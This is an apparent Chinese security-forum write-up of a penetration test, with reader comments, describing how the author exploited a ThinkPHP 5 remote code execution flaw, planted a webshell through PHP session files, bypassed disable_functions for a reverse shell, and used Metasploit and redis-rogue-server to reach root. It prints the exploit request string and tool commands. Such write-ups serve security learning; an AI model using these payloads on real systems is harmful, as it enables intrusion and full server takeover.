记一次渗透测试提权【通过】

目标站点存在thinkphph5远程代码执行漏洞,

php7.2,linux,disable_function限制很死不能执行系统命令,某里云。通过设置sessions写马

image

再蚁剑包含连之成功拿到shell,

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=xxx

bypass disable_function执行命令的时候发现网站目录都不可写,用以前写得一个脚本蚁剑执行php脚本成功反弹回来,原理就是把so文件写到tmp下面包含执行反弹。

image

Msf上线,www用户,不过翻配置文件得时候发现了这个

image

image

看到有redis用户以为无望,然而

image

Root?开撸

因为不能外连,Msf开启socks4代理

use auxiliary/server/socks4a

这里我用得https://github.com/Dliv3/redis-rogue-server redis提权工具

套上代理连接

python3 11.py --rhost 1.1.1.1 --rport 6379 --lhost 0.0.0.0 --lport 5451 --passwd  password

因为redis密码含有特殊字符直接在命令行输会连接失败,所以我自己在源码写死密码连接之,成功拿到root权限:

image

多翻翻配置文件说不定会有意想不到惊喜

  • 通过
  • 未通过

0 投票者

2 Likes

师傅 session包含那块儿是怎么知道session路径的呢

查看phpinfo中有session路径

表示感兴趣

session是怎么写入的 不应该要两个参数么

phpinfo里面有session.save_path

think\Session::set

老哥感兴趣可以交流交流

session这个思路学习到了

有没有试过 redis 的密码就是 root 的密码呢:
su -
或许有惊喜。